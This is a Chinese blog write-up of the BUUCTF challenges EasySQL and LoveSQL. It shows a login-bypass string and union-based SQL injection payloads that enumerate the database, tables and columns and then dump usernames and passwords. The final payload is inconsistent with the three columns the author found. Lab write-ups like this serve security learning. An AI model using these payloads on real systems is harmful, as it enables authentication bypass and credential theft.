1.7/1.8练习题

【Buuctf】[极客大挑战 2019]EasySQL & LoveSQL WP

EasySQL WP

这个题的考点主要是万能密码,注入的时候用hackbar可以提高效率。

hackbar的在firefox目前是收费的,可以去网上找之前的版本,下载安装。安装的时候注意把自动更新关闭,因为这个我重新安装了好多次😔。

万能密码的实质就是利用后台对用户登录信息没有检验,通过结合原来的url进行一系列的构造,创造一个能通过验证的信息。

这个题我用的是 admin ‘a’='a 密码为1登陆成功的。

LoveSQL WP

这个题用上一次的方法肯定是行不通的。

首先用order by测试出有3列(在4的时候报错)。然后开始尝试注入,这个题用union联合注入就行得通,所以直接干,上代码-》

uesrname=1' union select 1,database(),3 #

得到库名为geek。然后基本操作,爆表

username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 

得到两个表,geekuser和l0ve1ysq1。我的运气比较好,靠感觉先去试的l0ve1ysq1。

uesrname=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1' #

然后打印username和password

username=1' union select group_concat(username,0x3a,password) from l0ve1ysq1#

flag就是其中一组的password

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值